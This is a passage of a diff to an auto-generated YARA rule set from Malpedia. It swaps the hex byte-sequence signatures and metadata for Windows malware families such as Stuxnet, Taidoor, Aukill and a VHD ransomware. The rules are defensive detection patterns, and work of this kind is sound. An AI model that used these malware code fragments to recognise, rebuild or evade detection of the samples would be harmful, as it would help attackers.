+		$sequence_3 = { c78534ffffffdfa04cab c78538ffffff1a0dccc9 c7853cffffffc9d42289 c78540ffffff30bc1403 c78544ffffff1212cb9a c78548ffffff7c1bb287 }
+		$sequence_4 = { 50 53 ff5608 3bc3 745f 48 8945f8 }
+		$sequence_5 = { 6a06 8d472c 50 8d4588 }
+		$sequence_6 = { 33c0 8dbd04ffffff ab 889d08ffffff 8dbd09ffffff ab ab }
+		$sequence_7 = { 6800804000 ff15???????? 833d????????00 7508 6a01 e8???????? }
+		$sequence_8 = { 47 83c614 3b7d14 72e3 }
+		$sequence_9 = { 8955a0 c745a409da9df3 c745a8a050afad c745ac0df0ef96 c745b03b41b6e2 33c0 8d7db4 }
 
 	condition:
-		7 of them and filesize < 573440
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Chinotto_Auto : FILE
+rule MALPEDIA_Win_Aukill_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0573d972-e907-5e4b-a894-f42d60689ebb"
+		id = "db9d4a1a-ed53-5fea-bff5-185747bfbb51"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinotto"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chinotto_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aukill"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.aukill_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "7b0ad7ae03649166d50ba1fc6b2d39b3f99f903efd2a6958d5ba06fcea9fb997"
+		logic_hash = "cf5c7585c61eda7d5c6a56885b3d8ed6928646fd3abef78ed34135b918e268f8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114937,32 +115112,32 @@ rule MALPEDIA_Win_Chinotto_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8987f0e74100 83c704 83ff28 72e6 5f 5e c3 }
-		$sequence_1 = { 75ed 8b4e4c 894e50 c7473cc04a4000 eb06 }
-		$sequence_2 = { 894e0c 66c7065265 66c746026720 66c746045265 66c746066164 66c746082053 66c7460a7563 }
-		$sequence_3 = { 8b5ddc 3bdf 7426 f7460800000200 7424 83fa05 771f }
-		$sequence_4 = { 721d 8b4830 3b4834 7308 }
-		$sequence_5 = { 66894da6 b973000000 66894da8 b925000000 66894daa b973000000 }
-		$sequence_6 = { 897de8 3b7de4 0f8782010000 25ff7f0000 0fb61c02 8dbc318f000000 0fb63c07 }
-		$sequence_7 = { 8bec b810100000 e8???????? a1???????? 33c5 8945f8 8b4508 }
-		$sequence_8 = { 8b853cf7ffff 83c420 03d8 89b538f7ffff 85c0 758a 8b8534f7ffff }
-		$sequence_9 = { 56 52 50 8b4508 8b4834 8b5030 }
+		$sequence_0 = { 8905???????? c705????????02000000 48c705????????04000000 ff15???????? }
+		$sequence_1 = { 751d 488bcb ff15???????? ff15???????? }
+		$sequence_2 = { 7410 488bcf e8???????? 33c9 ff15???????? }
+		$sequence_3 = { 4489442420 453b01 7346 4b8d1440 410f104cd108 }
+		$sequence_4 = { 488bd3 33c9 ff15???????? 85c0 751f 488b4c2458 ff15???????? }
+		$sequence_5 = { ff15???????? 488bf8 4885c0 7514 ff15???????? }
+		$sequence_6 = { c744243c02000000 448d4810 4889442420 ff15???????? 85c0 751f 488b4c2458 }
+		$sequence_7 = { 4533c0 33d2 33c9 ff15???????? 4885c0 7409 488bc8 }
+		$sequence_8 = { 33c0 4889442428 c744243001000000 c744243c02000000 448d4810 4889442420 ff15???????? }
+		$sequence_9 = { 48894c2420 448d4920 48894c2450 488b0d???????? }
 
 	condition:
-		7 of them and filesize < 300032
+		7 of them and filesize < 446464
 }
-rule MALPEDIA_Win_Emdivi_Auto : FILE
+rule MALPEDIA_Win_Revenant_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "04ac374c-dabe-58e4-92b7-b141ee96d84c"
+		id = "89f91ed8-a64f-59de-9aac-43302ffc4c4f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.emdivi_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenant"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.revenant_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "17250ab484761cd3c4abb0e5e481a1578bae8e41059cc5bbab60b36acc5f6199"
+		logic_hash = "3200938fd857c1394fb14151a6f831277638c7dab5ca1a4886284fcf19cad884"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114976,32 +115151,32 @@ rule MALPEDIA_Win_Emdivi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1e304 83e203 3355f8 33fb }
-		$sequence_1 = { 53 50 889decfaffff e8???????? 83c40c 56 }
-		$sequence_2 = { 53 56 57 8bf8 83ff01 0f8ec5000000 }
-		$sequence_3 = { 50 e8???????? 83c40c 56 8d85b4fdffff 53 50 }
-		$sequence_4 = { 8945e4 e8???????? 8bd8 8bc6 59 c6432000 }
-		$sequence_5 = { 0f849b000000 8b4d08 83c604 ff45f8 85c9 7409 394df8 }
-		$sequence_6 = { 8975ec 8b03 8945f0 8b4304 8945f4 }
-		$sequence_7 = { 03fb 33fa 2939 8b31 054786c861 8945fc 0f856effffff }
-		$sequence_8 = { a1???????? 33c5 8945fc 8365d000 803e00 }
-		$sequence_9 = { ff75b8 8d45bc 6a40 6a01 50 e8???????? }
+		$sequence_0 = { 4889442458 4c8b4c2458 488d442470 41b800040000 4889d9 }
+		$sequence_1 = { 48ffc7 e8???????? ebe4 488d0d26370000 e8???????? 448b442428 4889f1 }
+		$sequence_2 = { 488d0d12260000 4989c1 e8???????? 488b742428 b902000000 e8???????? }
+		$sequence_3 = { 4889ef 4989c0 e8???????? 488b4c2428 31c0 f3aa 4889e9 }
+		$sequence_4 = { 7408 4889c7 4889d9 f3a4 }
+		$sequence_5 = { 488d0d28380000 89c2 e8???????? 4885f6 0f84b4000000 }
+		$sequence_6 = { e8???????? 418b542420 4889d9 e8???????? 488d542420 4989f0 }
+		$sequence_7 = { 4889c2 4889442420 7424 448b442428 31c9 }
+		$sequence_8 = { 4c89c2 7208 035008 4839d1 72ac 4883c028 4c39c8 }
+		$sequence_9 = { 448b442428 4889f1 488b542420 488d3d40370000 488d2d08370000 4c8d2520370000 }
 
 	condition:
-		7 of them and filesize < 581632
+		7 of them and filesize < 99328
 }
-rule MALPEDIA_Win_Taidoor_Auto : FILE
+rule MALPEDIA_Win_Ayegent_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ba437ab9-6c90-576a-83d2-5801ebb87e42"
+		id = "86255cdd-1f1d-55c6-b402-dbeb5a16b330"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.taidoor_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ayegent"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ayegent_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "7b8ed6f15654e580fefed39d2d4fea0473e69a1fd6a98339a075f2fbcf4be749"
+		logic_hash = "3b986bb07fdbef1927d912b3187f0b83148fd82afd809d6a4ef770e3327faaed"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115015,32 +115190,32 @@ rule MALPEDIA_Win_Taidoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7433 ff750c 889c05f4fbffff 50 8d85f4fbffff 6a01 50 }
-		$sequence_1 = { 395d10 7e1b 56 8b450c }
-		$sequence_2 = { 897df0 50 56 e8???????? 8b3d???????? 83f86f 750c }
-		$sequence_3 = { 83a00401000000 b001 c9 c20800 8b8104010000 }
-		$sequence_4 = { 7e24 8a0406 fec0 3c3a 8845ec }
-		$sequence_5 = { 57 a0???????? c745fc01000000 8ac8 f6d9 1bc9 33db }
-		$sequence_6 = { b940420f00 f7f9 8d45e0 52 ff35???????? ff35???????? }
-		$sequence_7 = { e9???????? 8d4de0 e8???????? 8d8588f7ffff 50 ff35???????? ffd6 }
-		$sequence_8 = { ff75ec 8d4df0 e8???????? 8b450c 46 3b70f8 7cdc }
-		$sequence_9 = { 53 50 53 c7458844000000 }
+		$sequence_0 = { 894c2411 8dbc2431030000 894c2415 889c2430030000 884c2419 b981000000 }
+		$sequence_1 = { 8d3449 2bd1 8d34b5c8764000 832600 83c60c 4a }
+		$sequence_2 = { e8???????? b940000000 33c0 8dbc2459040000 889c2458040000 f3ab }
+		$sequence_3 = { 8a842440020000 83c418 3ac3 751f 8b7c241c }
+		$sequence_4 = { 66ab aa 8d442408 56 50 ff15???????? 8d4c2408 }
+		$sequence_5 = { 3bf7 0f8e07ffffff 5f 5e }
+		$sequence_6 = { 8d7c2421 885c2420 f3ab 66ab 8d4c2420 }
+		$sequence_7 = { 66894c2404 33c0 8d4c2400 89442407 68???????? 51 }
+		$sequence_8 = { 56 e8???????? 85c0 7438 8bbc243c010000 8b1d???????? 8d4c2434 }
+		$sequence_9 = { 57 8b3d???????? 56 ffd7 83f807 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Xfsadm_Auto : FILE
+rule MALPEDIA_Win_Fancyfilter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6cee945a-b699-5b54-a37c-80744e975247"
+		id = "0361fd07-d305-5b73-bb16-8f25d1edd877"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xfsadm"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xfsadm_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fancyfilter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fancyfilter_auto.yar#L1-L112"
 		license_url = "N/A"
-		logic_hash = "f4eb82f59dbe07c8f1ee2d03c53cd893a45918aeff41d261754b918f12bf1430"
+		logic_hash = "476e24d851dbd343335f49ac83fe24b993db2eb5e282eab0e77caa734f27e50a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115054,32 +115229,32 @@ rule MALPEDIA_Win_Xfsadm_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 ffd6 68???????? 6a00 ffd7 85c0 740c }
-		$sequence_1 = { e8???????? 83c404 8b7508 c7430c00000000 c7431000000000 c7431400000000 8d4e01 }
-		$sequence_2 = { be01000000 eb02 33f6 8b4508 83c9ff 83c0f0 }
-		$sequence_3 = { ffb6ec000000 8bd8 ffb6d0000000 53 e8???????? 8b86d0000000 8d8ed4000000 }
-		$sequence_4 = { 5f 5e 5d c20400 8d4e0c e8???????? 50 }
-		$sequence_5 = { 75d9 ff06 ebd5 8a1f 80fb22 7405 80fb27 }
-		$sequence_6 = { 85ff 0f857f010000 53 68d80f0000 e8???????? 68d80f0000 }
-		$sequence_7 = { c702???????? e9???????? 8b86fc000000 81c6fc000000 }
-		$sequence_8 = { 33cc e8???????? 8be5 5d c21000 c605????????01 33c0 }
-		$sequence_9 = { b904000000 6a08 6a00 68e8030000 c7400201000000 a1???????? 6a00 }
+		$sequence_0 = { 85c0 740a 66833800 7404 b001 eb02 }
+		$sequence_1 = { 891d???????? 891d???????? b001 5b }
+		$sequence_2 = { 740a 66833800 7404 b001 eb02 }
+		$sequence_3 = { 750d 8b472c a801 7406 }
+		$sequence_4 = { a1???????? 83c012 50 ff15???????? a1???????? }
+		$sequence_5 = { 8d4f20 51 50 ff15???????? }
+		$sequence_6 = { 85c0 740a 66833800 7404 b001 eb02 32c0 }
+		$sequence_7 = { 8b07 83e810 50 83c610 }
+		$sequence_8 = { 85c0 750d 8b472c a801 }
+		$sequence_9 = { 85c0 750d 8b472c a801 7406 }
 
 	condition:
-		7 of them and filesize < 566272
+		7 of them and filesize < 169984
 }
-rule MALPEDIA_Win_Stuxnet_Auto : FILE
+rule MALPEDIA_Win_Chairsmack_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9c448caf-a5e3-53e6-be9a-4aa45334f7d3"
+		id = "2de2e9d5-c2ea-5429-bfd2-5525076f44e7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stuxnet_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chairsmack"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chairsmack_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "2029a68bba02441740da4f3ef9a391375e59b29e674666cb41a7f24fda7b29c9"
+		logic_hash = "97781ffb695d6aa345e6e0e1fc6bc5189db5a22419050af0ce259dc4d2e28203"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115093,32 +115268,32 @@ rule MALPEDIA_Win_Stuxnet_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? ff7508 8b45ec 8b4008 ff75f0 03c6 50 }
-		$sequence_1 = { a1???????? 85c0 7507 b805400080 eb39 56 ff7518 }
-		$sequence_2 = { ff760c e8???????? 59 6bdb38 8b4508 03d8 895e14 }
-		$sequence_3 = { e8???????? eb08 ff7508 e8???????? 59 8b4df4 64890d00000000 }
-		$sequence_4 = { b8???????? c3 b8???????? e8???????? 56 8b7508 57 }
-		$sequence_5 = { 6a24 e8???????? 59 8945ec 33f6 46 8975fc }
-		$sequence_6 = { e8???????? 84c0 744b 68???????? 8d442440 50 e8???????? }
-		$sequence_7 = { e8???????? 8945ec 8d45a8 50 e8???????? 8365fc00 8d45c4 }
-		$sequence_8 = { ff75e8 ff15???????? 3bc3 7505 e8???????? ffd0 85c0 }
-		$sequence_9 = { 8d55d8 52 ff7510 ff750c ff7508 51 50 }
+		$sequence_0 = { 8b5d08 ebd3 83fe03 75cb 8b45c0 ff7050 ff75ec }
+		$sequence_1 = { 8b4de0 83c104 e9???????? 8b542408 8d420c 8b4adc 33c8 }
+		$sequence_2 = { 50 8b4508 03c1 53 50 e8???????? 83c40c }
+		$sequence_3 = { 8bff 8b06 8d8d5cfeffff 3bc1 7409 83780400 8d7004 }
+		$sequence_4 = { c745d000000000 720b ff759c e8???????? 83c404 8b4598 }
+		$sequence_5 = { 7517 68cb0a0000 68???????? 68???????? e8???????? 83c40c 3bde }
+		$sequence_6 = { 52 8b45ec 50 e8???????? 83c40c 50 e8???????? }
+		$sequence_7 = { 83c41c ba???????? b9???????? e8???????? 8bf0 85db 7517 }
+		$sequence_8 = { 0106 e8???????? 8d4dd8 e8???????? 8d4d08 e8???????? 8d4d14 }
+		$sequence_9 = { 68???????? e8???????? 83ec1c c68424b803000062 8bcc 8964244c }
 
 	condition:
-		7 of them and filesize < 2495488
+		7 of them and filesize < 1974272
 }
-rule MALPEDIA_Win_Touchmove_Auto : FILE
+rule MALPEDIA_Win_Tandfuy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a88e9c25-4116-5e49-8a2c-fef3336f0802"
+		id = "98faff68-6444-5057-abe1-4d454646340b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.touchmove"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.touchmove_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tandfuy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tandfuy_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "519a7e3bd048a6a0769391087a62b1ec389f7202cc576a740e9eb0fb3d43844d"
+		logic_hash = "0d29f36f5ce30fba44a6664f50cc897adc5bd707aa4ee8b0311232ce455481f7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115132,32 +115307,32 @@ rule MALPEDIA_Win_Touchmove_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 41b800040000 488d8c2452010000 e8???????? 4c8d442448 488d152df90000 }
-		$sequence_1 = { 488d157af70000 488d8d90000000 e8???????? 4c8d8590000000 33d2 33c9 }
-		$sequence_2 = { 7528 48833d????????00 741e 488d0d499f0000 e8???????? 85c0 }
-		$sequence_3 = { 41b8ee000000 488d8d92430000 e8???????? c6858044000000 33d2 41b8ff000000 488d8d81440000 }
-		$sequence_4 = { ff15???????? 488d442450 4889442420 458bce 4533c0 488d9580410000 48c7c102000080 }
-		$sequence_5 = { 0f8514010000 4c8d2d36cd0000 41b804010000 668935???????? 498bd5 ff15???????? 418d7c24e7 }
-		$sequence_6 = { 48833d????????00 0f844d040000 48833d????????00 0f843f040000 }
-		$sequence_7 = { 833d????????00 7505 e8???????? 488d3d40e00000 41b804010000 }
-		$sequence_8 = { 488bfb 488bf3 48c1fe05 4c8d25bebd0000 83e71f 486bff58 }
-		$sequence_9 = { 8bc8 e8???????? ebc9 488bcb 488bc3 488d1597e40000 48c1f805 }
+		$sequence_0 = { c3 b910000000 33c0 8d7c240c 8a54244d f3ab bf???????? }
+		$sequence_1 = { 8d44240c 50 c644241032 88542440 e8???????? 84c0 88442408 }
+		$sequence_2 = { 50 e8???????? b93f000000 33c0 8dbdecfdffff f3ab 66ab }
+		$sequence_3 = { 83c408 85c0 7418 8b5c2418 3bf3 7412 57 }
+		$sequence_4 = { 33c0 59 c3 8b44240c 50 ff15???????? b801000000 }
+		$sequence_5 = { 8dbc24c4020000 8d9424c4020000 f3ab 8d7c242c 83c9ff f2ae }
+		$sequence_6 = { 8d4c2408 89442400 51 8b4c2418 }
+		$sequence_7 = { 83c408 85c0 7418 8b5c2418 3bf3 7412 }
+		$sequence_8 = { e8???????? ffb69cd76e00 8d8560ffffff 50 e8???????? 6810200100 8d8560ffffff }
+		$sequence_9 = { 85c0 0f84ea000000 8d4c2424 51 68???????? 53 ff15???????? }
 
 	condition:
-		7 of them and filesize < 224256
+		7 of them and filesize < 155648
 }
-rule MALPEDIA_Win_Unidentified_077_Auto : FILE
+rule MALPEDIA_Win_Webc2_Table_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c7f9be79-20b6-5aa4-9bbd-94e7c4c6bef7"
+		id = "f2e05018-a2cd-5f74-9326-c8e1d8ecd04d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_077"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_077_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_table"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_table_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "90028d042242a66c9237db24c75f8aa2228010ebd44b2069db8290680e688e20"
+		logic_hash = "7af577baa9db86d99239cfd53a2d34bbabd6fc2e47d46dae6b2b1756d43598d7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115171,32 +115346,32 @@ rule MALPEDIA_Win_Unidentified_077_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 410fb74716 c1e80d 83e001 48896e58 894620 488d058dfcffff 48894628 }
-		$sequence_1 = { ba30750000 c744242030750000 448bca 448bc2 488bcf ff15???????? }
-		$sequence_2 = { 48895c2458 ff15???????? 488bf8 4885c0 750e ff15???????? }
-		$sequence_3 = { 2bcb 3bc8 7653 8bd1 }
-		$sequence_4 = { 4883ec38 33c0 4c8d05b3feffff 4889442428 4533c9 }
-		$sequence_5 = { ff15???????? 488bce 418907 ff15???????? }
-		$sequence_6 = { 83e03f 2bc8 48d3cf 4933fa 4b87bcf7e0c70100 33c0 }
-		$sequence_7 = { 83e001 48896e58 894620 488d058dfcffff 48894628 488d0592fcffff }
-		$sequence_8 = { e9???????? 493bec 0f84be000000 8b7500 33c0 f04d0fb1bcf180bf0100 }
-		$sequence_9 = { 8bc2 f30f6f0418 660fefc1 f30f7f0418 8d4210 }
+		$sequence_0 = { 59 85c0 59 7534 8d85e4feffff }
+		$sequence_1 = { 53 50 e8???????? 6a07 8d8558ffffff }
+		$sequence_2 = { 56 8d8558ffffff 53 50 e8???????? 6a0a 8d8558ffffff }
+		$sequence_3 = { 57 53 894dec ffd6 59 3bc3 }
+		$sequence_4 = { 6880000000 8d8558ffffff 53 50 e8???????? }
+		$sequence_5 = { 83c418 ffd6 8d45e4 50 8d45d4 }
+		$sequence_6 = { 8d45e8 c745e864000000 50 8d851cfeffff 50 ff15???????? 8d851cfeffff }
+		$sequence_7 = { ab ab 66ab aa baff000000 33c0 8bca }
+		$sequence_8 = { 3bc3 59 0f84fa020000 81fec8000000 0f8dee020000 8d46f5 50 }
+		$sequence_9 = { 8b55f0 8bcf 2bd7 8975f8 }
 
 	condition:
-		7 of them and filesize < 270336
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Mangzamel_Auto : FILE
+rule MALPEDIA_Win_Dustpan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b83ef951-bd5b-5678-b2df-639cf3b41b3c"
+		id = "c9c878b8-cad8-5a19-8f4e-78ad38029b7f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mangzamel_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dustpan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dustpan_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "f6c1e5305bfe68c66a3ef4b49c38bfc3eb7f92ef914438435cd55d230265d8d5"
+		logic_hash = "5224f428476ca9b9e044abefc44ce9a53e06974708bc3448eb44f67994867ab4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115210,32 +115385,32 @@ rule MALPEDIA_Win_Mangzamel_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d5e64 33ff 8bcb 897dfc e8???????? }
-		$sequence_1 = { 85c0 7434 8b8e8c000000 8908 eb2a 8b4510 802000 }
-		$sequence_2 = { 8b4008 8945b8 8b4dd8 57 8d45a8 57 50 }
-		$sequence_3 = { 8975f0 c706???????? c745fc02000000 e8???????? 8d8e88000000 c645fc01 }
-		$sequence_4 = { 8d440103 c3 56 57 8b7c2410 6a68 6a00 }
-		$sequence_5 = { ffb18c000000 50 6802501333 eb32 8b01 ff5038 eb30 }
-		$sequence_6 = { 834dfcff 8d8db8fdffff e8???????? 8b4df4 b001 5e 64890d00000000 }
-		$sequence_7 = { 51 50 e8???????? 8bf0 59 3bf3 59 }
-		$sequence_8 = { 83ea00 7421 4a 7412 4a }
-		$sequence_9 = { e8???????? 51 56 57 8b7d08 85ff }
+		$sequence_0 = { 4533c0 4c891d???????? e8???????? 488d0d32010000 4883c420 5b e9???????? }
+		$sequence_1 = { b9ff000000 e8???????? 488bfb 4803ff 4c8d2d45eb0000 }
+		$sequence_2 = { 488d0d19a80100 33d2 c744242800000008 895c2420 ffd0 488b4d00 4833cc }
+		$sequence_3 = { 4c8be7 4c8bf7 49c1fe05 4c8d3dffb60000 }
+		$sequence_4 = { 488d05fb0a0100 eb04 4883c014 8918 e8???????? 4c8d15e30a0100 4885c0 }
+		$sequence_5 = { 7440 66448923 8a45d8 4b8b8cf8e0d00100 88443109 8a45d9 }
+		$sequence_6 = { e9???????? 488d0d45010000 e9???????? 4883ec28 488d0d12910000 e8???????? 488d0d39010000 }
+		$sequence_7 = { 488bca 48c1f905 4c8d0533760100 83e21f }
+		$sequence_8 = { 4889442420 e8???????? 488d8380000000 803800 741d 4c8d0df2bc0000 41b802000000 }
+		$sequence_9 = { 894704 e9???????? 488d0d351f0100 48394c2458 7427 }
 
 	condition:
-		7 of them and filesize < 360448
+		7 of them and filesize < 282624
 }
-rule MALPEDIA_Win_Simda_Auto : FILE
+rule MALPEDIA_Win_Unidentified_105_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d74b8ce3-47a5-51db-a32e-c17b32ae8c86"
+		id = "eddc8e7d-c7d8-56a8-9cd5-0e8cda2282d2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.simda"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.simda_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_105"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_105_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "843d6d6caa38939c108c027a85a80f4565ce68a6213223a9ac5f7b9c75de56e2"
+		logic_hash = "4e03e917de401318ff8b0ae85a40744aaa875bb14cd2721a1a9fd7b49998e501"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115249,34 +115424,34 @@ rule MALPEDIA_Win_Simda_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f906 7519 8b85e8feffff 85c0 }
-		$sequence_1 = { 0faffe 8bd0 0faf55fc 8bd9 8bf7 c1e610 c1e110 }
-		$sequence_2 = { 8b85e8feffff 85c0 7505 8d41ff eb0f 83f801 }
-		$sequence_3 = { 56 ff15???????? 8b4d08 6a00 8d45fc }
-		$sequence_4 = { 8b7510 57 e8???????? 57 8bf3 e8???????? }
-		$sequence_5 = { 7601 48 8bd1 c1ea10 }
-		$sequence_6 = { 3bd0 7301 41 8b4508 0faff3 03f1 }
-		$sequence_7 = { 33d2 bb06000000 f7f3 8a5415f0 }
-		$sequence_8 = { 8b38 f7d9 3b3c18 7301 41 }
-		$sequence_9 = { 85c0 75dd 8b4d0c 8bc3 2bc2 }
+		$sequence_0 = { 51 53 56 57 6800002000 }
+		$sequence_1 = { 8d542420 e8???????? 85c0 740d 6a64 ff15???????? }
+		$sequence_2 = { 84d2 75f9 2bc1 8bf8 8d4f02 }
+		$sequence_3 = { 50 51 68???????? 53 e8???????? 8b95ecfeffff }
+		$sequence_4 = { 8945fc 83ff04 7e7b 8d57fb c1ea02 42 }
+		$sequence_5 = { e8???????? 6800002000 8bd8 6a00 53 e8???????? }
+		$sequence_6 = { 75f9 2b55f0 8d45f8 50 53 52 }
+		$sequence_7 = { 50 68???????? 52 e8???????? 83c414 6800020000 e8???????? }
+		$sequence_8 = { 8818 3bca 752a 0fbe0c31 83e103 }
+		$sequence_9 = { 56 8d95f8efffff 52 8d041f 50 e8???????? 8b85f4efffff }
 
 	condition:
-		7 of them and filesize < 1581056
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Graphdrop_Auto : FILE
+rule MALPEDIA_Win_Vhd_Ransomware_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "24fb95a1-20eb-59d2-a21c-2ae5bcca80f7"
+		id = "fa5e5a99-c535-5a94-a209-b7a09fa24c2a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphdrop"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.graphdrop_auto.yar#L1-L108"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vhd_ransomware"
